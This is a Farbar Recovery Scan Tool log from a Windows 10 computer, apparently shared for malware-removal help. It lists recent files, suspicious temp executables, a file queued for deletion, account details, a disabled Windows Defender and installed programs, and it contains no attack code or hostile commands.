2017-11-14 13:53 - 2017-10-15 06:00 - 000061952 ____C (Microsoft Corporation) C:\WINDOWS\system32\vss_ps.dll
2017-11-09 04:40 - 2017-11-09 04:40 - 036248176 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2017-11-09 04:40 - 2017-11-09 04:40 - 029279672 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2017-11-09 04:40 - 2017-11-09 04:40 - 000624240 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2017-11-09 04:39 - 2017-11-09 04:39 - 000989808 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2017-11-09 04:39 - 2017-11-09 04:39 - 000940984 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2017-11-09 04:39 - 2017-11-09 04:39 - 000514672 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2017-11-09 04:39 - 2017-11-09 04:39 - 000054192 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvhdap64.dll
2017-11-09 04:38 - 2017-11-09 04:38 - 001997752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438813.dll
2017-11-09 04:38 - 2017-11-09 04:38 - 001682544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438813.dll
2017-11-09 04:38 - 2017-11-09 04:38 - 001108408 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2017-11-09 04:38 - 2017-11-09 04:38 - 000748144 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll
2017-11-09 04:38 - 2017-11-09 04:38 - 000607160 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll
2017-11-09 04:37 - 2017-11-09 04:37 - 040246384 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll
2017-11-09 04:37 - 2017-11-09 04:37 - 035165624 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll
2017-11-09 04:37 - 2017-11-09 04:37 - 004210288 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2017-11-09 04:37 - 2017-11-09 04:37 - 003623024 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2017-11-09 04:30 - 2017-11-09 04:30 - 023474480 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2017-11-09 04:30 - 2017-11-09 04:30 - 019212720 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2017-11-09 04:30 - 2017-11-09 04:30 - 013379352 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2017-11-09 04:30 - 2017-11-09 04:30 - 010986768 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2017-11-09 04:30 - 2017-11-09 04:30 - 000633256 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2017-11-09 04:26 - 2017-11-09 04:26 - 001154296 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
2017-11-09 04:26 - 2017-11-09 04:26 - 000902312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2017-11-09 04:26 - 2017-11-09 04:26 - 000810304 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2017-11-09 04:25 - 2017-11-09 04:25 - 013994136 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2017-11-09 04:25 - 2017-11-09 04:25 - 011891200 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2017-11-09 04:25 - 2017-11-09 04:25 - 001351792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFThevc.dll
2017-11-09 04:25 - 2017-11-09 04:25 - 001342008 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2017-11-09 04:25 - 2017-11-09 04:25 - 001062920 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFThevc.dll
2017-11-09 04:25 - 2017-11-09 04:25 - 001056720 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2017-11-04 16:50 - 2017-11-04 16:50 - 000102038 ____C C:\Users\Jpoch\Downloads\pochop (1) (2).pdf
2017-11-04 16:35 - 2017-11-04 16:35 - 000102038 ____C C:\Users\Jpoch\Downloads\pochop (1) (1) (1).pdf
2017-11-02 20:25 - 2017-11-02 20:25 - 000000044 _____ C:\Users\Jpoch\jagex_cl_oldschool_LIVE.dat
2017-10-28 14:30 - 2017-11-17 15:36 - 000001966 ____C C:\Users\Public\Desktop\RuneMate.lnk
2017-10-28 06:18 - 2017-11-09 04:25 - 000648728 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2017-10-28 06:18 - 2017-10-12 13:38 - 001988032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438800.dll
2017-10-28 06:18 - 2017-10-12 13:38 - 001606592 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438800.dll
2017-10-28 06:18 - 2017-10-12 13:38 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2017-10-28 06:18 - 2017-10-12 13:38 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json
2017-10-28 03:08 - 2017-10-28 03:08 - 000000000 ____D C:\Users\Jpoch\.jagex_cache_32
2017-10-28 03:03 - 2017-11-17 15:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RuneMate
2017-10-28 03:03 - 2017-11-17 15:36 - 000000000 ____D C:\Program Files (x86)\RuneMate
2017-10-28 02:53 - 2017-11-21 00:25 - 000000044 _____ C:\Users\Jpoch\jagex_cl_runescape_LIVE.dat
2017-10-28 02:53 - 2017-11-21 00:25 - 000000024 _____ C:\Users\Jpoch\jagexappletviewer.preferences
2017-10-28 02:53 - 2017-11-21 00:21 - 000000024 _____ C:\Users\Jpoch\random.dat
2017-10-28 02:53 - 2017-11-20 21:31 - 000000000 ___DC C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RuneScape
2017-10-28 02:53 - 2017-11-02 20:25 - 000000000 ____D C:\Users\Jpoch\jagexcache
2017-10-28 02:53 - 2017-10-28 02:53 - 000002106 ___HC C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RuneScape.lnk
2017-10-28 02:53 - 2017-10-28 02:53 - 000002076 ___HC C:\Users\Jpoch\Desktop\RuneScape.lnk
2017-10-28 02:53 - 2017-10-28 02:53 - 000000000 ___DC C:\.jagex_cache_32
2017-10-28 02:52 - 2017-10-28 02:52 - 000000000 ____D C:\Users\Jpoch\AppData\Roaming\com.runemate.boot.Boot
2017-10-28 02:41 - 2017-10-28 06:02 - 000000000 ____D C:\Users\Jpoch\RuneMate
2017-10-26 21:09 - 2017-11-19 04:12 - 000000000 ____D C:\Users\Jpoch\AppData\Local\Jagex
2017-10-26 21:09 - 2017-11-19 04:12 - 000000000 ____D C:\ProgramData\Jagex
2017-10-26 21:09 - 2017-10-26 21:09 - 000000177 ____C C:\Users\Public\Desktop\RuneScape Launcher.url
2017-10-26 21:09 - 2017-10-26 21:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Jagex
2017-10-26 21:09 - 2017-10-26 21:09 - 000000000 ____D C:\Program Files\Jagex
2017-10-26 20:53 - 2013-04-06 17:16 - 000203976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RICHTX32.OCX
2017-10-26 20:53 - 2013-04-06 17:16 - 000117507 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinet.ocx
2017-10-26 20:53 - 2013-04-06 17:16 - 000109248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSWINSCK.OCX
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-11-21 00:34 - 2017-05-29 00:49 - 000048666 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2017-11-21 00:28 - 2017-04-15 18:08 - 002858874 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-11-21 00:23 - 2017-06-21 16:19 - 000000000 ____D C:\Users\Jpoch\AppData\Roaming\Twitch
2017-11-21 00:23 - 2017-04-15 18:07 - 000000000 ____D C:\ProgramData\NVIDIA
2017-11-21 00:23 - 2016-11-26 15:19 - 000000000 ___DC C:\Program Files (x86)\Steam
2017-11-21 00:22 - 2017-04-15 18:15 - 000000006 ___HC C:\WINDOWS\Tasks\SA.DAT
2017-11-21 00:22 - 2017-04-15 18:08 - 000000000 ____D C:\Users\Jpoch
2017-11-21 00:22 - 2016-11-14 00:24 - 000000000 ___DC C:\Users\Jpoch\AppData\Local\TSVNCache
2017-11-21 00:22 - 2016-11-11 03:58 - 000000000 ___DC C:\Users\Jpoch\AppData\Roaming\Spotify
2017-11-21 00:22 - 2016-11-11 03:58 - 000000000 ___DC C:\Users\Jpoch\AppData\Local\Spotify
2017-11-21 00:22 - 2016-11-07 01:20 - 000000000 ___DC C:\Program Files (x86)\Mozilla Maintenance Service
2017-11-21 00:22 - 2016-11-07 01:18 - 000000000 __RDC C:\Users\Jpoch\OneDrive
2017-11-21 00:21 - 2017-03-18 03:40 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2017-11-20 23:50 - 2017-03-18 13:03 - 000000000 ____D C:\Program Files\Yaminguict Explorer for ERC
2017-11-20 23:47 - 2016-11-20 10:02 - 000000000 ___DC C:\Users\Jpoch\AppData\LocalLow\Mozilla
2017-11-20 23:05 - 2017-08-26 03:04 - 000000000 ___DC C:\Program Files (x86)\Mozilla Firefox
2017-11-20 23:05 - 2016-11-07 01:20 - 000001228 ____H C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-11-20 23:05 - 2016-11-07 01:20 - 000001216 ___HC C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-11-20 21:31 - 2017-07-22 22:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Warcraft
2017-11-20 21:31 - 2017-06-20 22:11 - 000000000 ___DC C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nexon
2017-11-20 21:31 - 2016-11-22 01:51 - 000000000 ___DC C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2017-11-20 21:24 - 2016-11-07 01:05 - 000000000 __HDC C:\WINDOWS\system32\GroupPolicy
2017-11-20 19:26 - 2017-04-15 18:15 - 000004166 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{6C5C8D5B-3F1D-41FE-A3D3-3BC89DC30923}
2017-11-20 19:26 - 2017-03-18 13:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-11-20 19:26 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-11-20 19:25 - 2016-11-07 01:20 - 000002344 ____H C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-11-20 19:25 - 2016-11-07 01:20 - 000002332 ___HC C:\Users\Public\Desktop\Google Chrome.lnk
2017-11-20 19:23 - 2017-04-15 18:06 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-11-19 14:00 - 2017-05-23 04:32 - 000000000 ____D C:\ProgramData\VMware
2017-11-19 14:00 - 2017-05-23 04:32 - 000000000 ____D C:\Program Files (x86)\VMware
2017-11-19 14:00 - 2017-03-18 13:01 - 000000000 ____D C:\WINDOWS\INF
2017-11-19 13:57 - 2017-07-22 20:07 - 000001079 ____C C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-11-19 13:57 - 2017-07-22 20:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-11-19 13:52 - 2016-11-07 15:23 - 000000000 ___DC C:\Users\Jpoch\AppData\Local\CrashDumps
2017-11-19 05:05 - 2017-04-08 23:19 - 000000000 ___DC C:\ProgramData\Oracle
2017-11-19 04:20 - 2017-05-23 04:34 - 000000000 ____D C:\Users\Jpoch\AppData\Roaming\VMware
2017-11-19 04:20 - 2017-05-23 04:34 - 000000000 ____D C:\Users\Jpoch\AppData\Local\VMware
2017-11-19 03:18 - 2017-04-15 18:08 - 002768814 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
2017-11-19 03:10 - 2017-04-15 18:15 - 000003416 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-11-19 03:10 - 2017-04-15 18:15 - 000003292 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-11-19 02:50 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2017-11-19 02:50 - 2016-11-07 02:23 - 000000000 ___DC C:\Users\Jpoch\AppData\Roaming\NVIDIA
2017-11-18 13:54 - 2017-04-15 18:07 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-11-18 13:54 - 2016-11-07 01:51 - 000000000 ___DC C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-11-17 17:04 - 2017-04-15 18:15 - 000003188 _____ C:\WINDOWS\System32\Tasks\Shutdown
2017-11-17 14:18 - 2017-03-18 12:51 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-11-16 23:57 - 2016-11-07 01:20 - 000000000 ___DC C:\Users\Jpoch\AppData\Roaming\Mozilla
2017-11-15 20:33 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\rescache
2017-11-15 19:07 - 2017-04-15 18:06 - 000221848 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-11-15 19:07 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\system32\appraiser
2017-11-15 19:07 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-11-15 19:07 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\Provisioning
2017-11-15 19:07 - 2017-03-18 13:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-11-15 19:07 - 2017-03-18 13:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-11-15 19:07 - 2016-11-07 01:17 - 000000000 _RHDC C:\Users\Public\AccountPictures
2017-11-14 13:57 - 2016-11-07 04:08 - 000000000 ___DC C:\WINDOWS\system32\MRT
2017-11-14 13:54 - 2017-10-11 07:07 - 127017032 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT-KB890830.exe
2017-11-14 13:54 - 2016-11-07 04:08 - 127017032 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-11-14 03:52 - 2017-04-15 18:15 - 000004600 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2017-11-14 03:52 - 2017-04-15 18:15 - 000004386 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-11-14 03:52 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-11-14 03:52 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\system32\Macromed
2017-11-09 04:38 - 2017-05-23 01:31 - 001039800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2017-11-09 04:38 - 2017-04-06 17:56 - 001624168 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvhdagenco6420103.dll
2017-11-09 04:38 - 2017-04-06 17:56 - 000233904 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvhda64v.sys
2017-11-09 04:25 - 2017-04-06 17:56 - 004533184 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2017-11-09 04:25 - 2017-04-06 17:56 - 003859848 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2017-11-09 03:57 - 2017-04-06 17:56 - 000048442 _____ C:\WINDOWS\system32\nvinfo.pb
2017-11-04 17:40 - 2017-03-18 13:06 - 000835568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-11-04 17:40 - 2017-03-18 13:06 - 000177648 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-11-02 01:13 - 2017-07-22 21:04 - 000003376 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3446151218-491997262-3667861278-1001
2017-11-02 01:13 - 2016-11-07 01:18 - 000002363 ____C C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-10-30 17:47 - 2017-04-15 18:07 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-10-28 16:28 - 2016-11-07 01:51 - 000000000 ___DC C:\Users\Jpoch\AppData\Local\NVIDIA
2017-10-28 06:19 - 2017-04-15 18:07 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-10-28 06:14 - 2017-05-22 18:59 - 000004000 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2017-04-15 18:15 - 000004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2017-04-15 18:15 - 000003940 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2017-04-15 18:15 - 000003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2017-04-15 18:15 - 000003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2017-04-15 18:15 - 000003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2017-04-15 18:15 - 000003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2017-04-15 18:15 - 000003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2016-11-07 02:22 - 000001485 ____C C:\Users\Public\Desktop\GeForce Experience.lnk
2017-10-28 03:00 - 2016-11-14 00:33 - 000000000 ___DC C:\Users\Jpoch\OneDrive\Documents\Buddywing
2017-10-28 03:00 - 2016-11-07 01:33 - 000000000 ___DC C:\ProgramData\Package Cache
2017-10-27 08:36 - 2017-04-15 18:07 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-10-27 08:12 - 2017-04-15 18:07 - 005960824 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-10-27 08:12 - 2017-04-15 18:07 - 002587768 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-10-27 08:12 - 2017-04-15 18:07 - 001766520 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-10-27 08:12 - 2017-04-15 18:07 - 000607168 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-10-27 08:12 - 2017-04-15 18:07 - 000449656 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-10-27 08:12 - 2017-04-15 18:07 - 000123000 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-10-27 08:12 - 2017-04-15 18:07 - 000081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-10-26 12:36 - 2017-08-15 21:37 - 000000000 ___DC C:\Users\Jpoch\Desktop\ExileB
2017-10-25 02:33 - 2017-04-15 18:07 - 007802921 _____ C:\WINDOWS\system32\nvcoproc.bin
 
Files to move or delete:
====================
C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE
 
 
Some files in TEMP:
====================
2017-11-20 23:50 - 2017-11-20 23:50 - 000920448 _____ () C:\Users\Jpoch\AppData\Local\Temp\ANONYMIZERGADGETSETUP.1.000.1680.EXE
2017-11-19 13:52 - 2017-11-19 13:52 - 000066048 ____N () C:\Users\Jpoch\AppData\Local\Temp\browsercontrol1821656749766913247.dll
2017-11-19 05:06 - 2017-11-19 05:06 - 000066048 ____N () C:\Users\Jpoch\AppData\Local\Temp\browsercontrol2428701416925250673.dll
2017-11-19 05:19 - 2017-11-19 05:19 - 000066048 ____N () C:\Users\Jpoch\AppData\Local\Temp\browsercontrol4782498541490236059.dll
2017-11-19 05:08 - 2017-11-19 05:08 - 000066048 ____N () C:\Users\Jpoch\AppData\Local\Temp\browsercontrol4864669260505593703.dll
2017-11-19 13:54 - 2017-11-19 13:54 - 000066048 ____N () C:\Users\Jpoch\AppData\Local\Temp\browsercontrol7959174752991907385.dll
2017-11-19 05:19 - 2017-11-19 05:19 - 000066048 ____N () C:\Users\Jpoch\AppData\Local\Temp\browsercontrol8588072608957644732.dll
2017-11-20 21:08 - 2017-09-04 21:26 - 001930840 _____ (Microsoft Corporation) C:\Users\Jpoch\AppData\Local\Temp\dllnt_dump.dll
2017-11-20 23:50 - 2017-11-20 23:50 - 000611820 _____ (                                                            ) C:\Users\Jpoch\AppData\Local\Temp\GLOBAL_INSTALLER.EXE
2017-10-28 03:03 - 2017-11-17 15:36 - 000035680 _____ () C:\Users\Jpoch\AppData\Local\Temp\i4jdel0.exe
2017-11-19 05:19 - 2017-11-19 05:19 - 000347147 ____N (Java™ Native Access (JNA)) C:\Users\Jpoch\AppData\Local\Temp\jna1454976152888162013.dll
2017-11-19 05:08 - 2017-11-19 05:08 - 000347147 ____N (Java™ Native Access (JNA)) C:\Users\Jpoch\AppData\Local\Temp\jna2356716768812245971.dll
2017-11-19 05:03 - 2017-11-19 05:03 - 000347147 ____N (Java™ Native Access (JNA)) C:\Users\Jpoch\AppData\Local\Temp\jna2571604950642716971.dll
2017-11-19 05:19 - 2017-11-19 05:19 - 000347147 ____N (Java™ Native Access (JNA)) C:\Users\Jpoch\AppData\Local\Temp\jna6489124396195937904.dll
2017-11-19 13:54 - 2017-11-19 13:54 - 000347147 ____N (Java™ Native Access (JNA)) C:\Users\Jpoch\AppData\Local\Temp\jna67602113627596301.dll
2017-11-19 05:06 - 2017-11-19 05:06 - 000347147 ____N (Java™ Native Access (JNA)) C:\Users\Jpoch\AppData\Local\Temp\jna9127391409595174785.dll
2017-11-19 13:52 - 2017-11-19 13:52 - 000347147 ____N (Java™ Native Access (JNA)) C:\Users\Jpoch\AppData\Local\Temp\jna9211796949506494497.dll
2017-11-20 23:50 - 2017-11-20 23:50 - 004188040 _____ (                                                            ) C:\Users\Jpoch\AppData\Local\Temp\ONESYSTEMCARE.EXE
2017-11-12 17:08 - 2017-11-12 17:08 - 013551616 _____ (Team RuneMate) C:\Users\Jpoch\AppData\Local\Temp\RuneMate_2_72_1_0_windows_i586_setup.exe
2017-11-16 15:43 - 2017-11-16 15:43 - 013549568 _____ (Team RuneMate) C:\Users\Jpoch\AppData\Local\Temp\RuneMate_2_73_0_0_windows_i586_setup.exe
2017-11-17 15:36 - 2017-11-17 15:36 - 013555712 _____ (Team RuneMate) C:\Users\Jpoch\AppData\Local\Temp\RuneMate_2_74_0_0_windows_i586_setup.exe
2017-11-19 02:50 - 2017-11-19 02:50 - 005885952 _____ () C:\Users\Jpoch\AppData\Local\Temp\setup (1).exe
2017-11-20 23:50 - 2017-11-20 23:50 - 000605254 _____ (                                                            ) C:\Users\Jpoch\AppData\Local\Temp\Setup.exe
2017-11-20 23:50 - 2017-11-20 23:50 - 000591544 _____ (                                                            ) C:\Users\Jpoch\AppData\Local\Temp\SETUPTEXTTOTALK.EXE
2017-11-20 23:50 - 2017-11-20 23:50 - 000288272 _____ () C:\Users\Jpoch\AppData\Local\Temp\svchost.exe
2017-11-19 02:49 - 2017-11-19 02:49 - 002849376 _____ (BitTorrent Inc.) C:\Users\Jpoch\AppData\Local\Temp\VMwareworkstationfull14.0.06661328.exe
2017-11-19 13:57 - 2017-11-19 13:57 - 007189760 _____ (VS Revo Group                                               ) C:\Users\Jpoch\AppData\Local\Temp\VSUSetup.exe
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-11-11 18:22
 
==================== End of FRST.txt ============================
 
 
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 19-11-2017
Ran by Jpoch (21-11-2017 00:35:02)
Running from C:\Users\Jpoch\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads
Windows 10 Home Version 1703 15063.726 (X64) (2017-04-16 02:17:02)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-3446151218-491997262-3667861278-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3446151218-491997262-3667861278-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-3446151218-491997262-3667861278-1000 - Limited - Disabled) => C:\Users\defaultuser0
Guest (S-1-5-21-3446151218-491997262-3667861278-501 - Limited - Disabled)
Jpoch (S-1-5-21-3446151218-491997262-3667861278-1001 - Administrator - Enabled) => C:\Users\Jpoch
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Active Directory Authentication Library for SQL Server (HKLM\...\{32C0D7B2-1046-43AC-98AD-B748E1910916}) (Version: 13.0.1601.5 - Microsoft Corporation) Hidden
Active Directory Authentication Library for SQL Server (x86) (HKLM-x32\...\{F40FA676-46B1-4609-85EF-D2F1F79E0C0E}) (Version: 13.0.1601.5 - Microsoft Corporation) Hidden
Adobe Flash Player 27 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 27.0.0.187 - Adobe Systems Incorporated)
Adobe Flash Player 27 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 27.0.0.187 - Adobe Systems Incorporated)
Application Insights Tools for Visual Studio 2015 (HKLM-x32\...\{0E4C791E-B78E-477D-BD5A-CDD0985BA6EC}) (Version: 7.0.20622.1 - Microsoft Corporation)
AutoHotkey 1.1.26.01 (HKLM-x32\...\AutoHotkey) (Version: 1.1.26.01 - Lexikos)
Azure AD Authentication Connected Service (HKLM-x32\...\{8A1AD070-269F-4A15-AAB5-76AB896EF195}) (Version: 14.0.25420 - Microsoft Corporation) Hidden
AzureTools.Notifications (HKLM-x32\...\{1E5CA362-39B6-4BD0-B9C0-69CF15F0FEA2}) (Version: 2.7.30611.1601 - Microsoft Corporation) Hidden
Blend for Visual Studio SDK for .NET 4.5 (HKLM-x32\...\{37E53780-3944-4A6A-842F-727128E8616E}) (Version: 3.0.40218.0 - Microsoft Corporation) Hidden
Blizzard App (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
CCleaner (HKLM\...\CCleaner) (Version: 5.29 - Piriform)
Dotfuscator and Analytics Community Edition 5.22.0 (HKLM-x32\...\{60018889-9E0F-43E8-9B89-29E8C828B40A}) (Version: 5.22.0.3788 - PreEmptive Solutions) Hidden
Entity Framework 6.1.3 Tools  for Visual Studio 2015 Update 1 (HKLM-x32\...\{2A56910C-69C8-495D-8ED8-9080F0A14E58}) (Version: 14.0.41103.0 - Microsoft Corporation)
Exilebuddy (HKLM-x32\...\{5caaff94-d2e7-4c9c-b87b-c3a773f8882a}) (Version: 0.2.4928.271 - Bossland GmbH)
Exilebuddy (HKLM-x32\...\{9D8CA614-2A7D-43B2-A59E-E16BC61C8AB0}) (Version: 0.2.4928.271 - Bossland GmbH) Hidden
GitHub (HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\5f7eb300e2ea4ebf) (Version: 3.3.4.0 - GitHub, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 62.0.3202.94 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
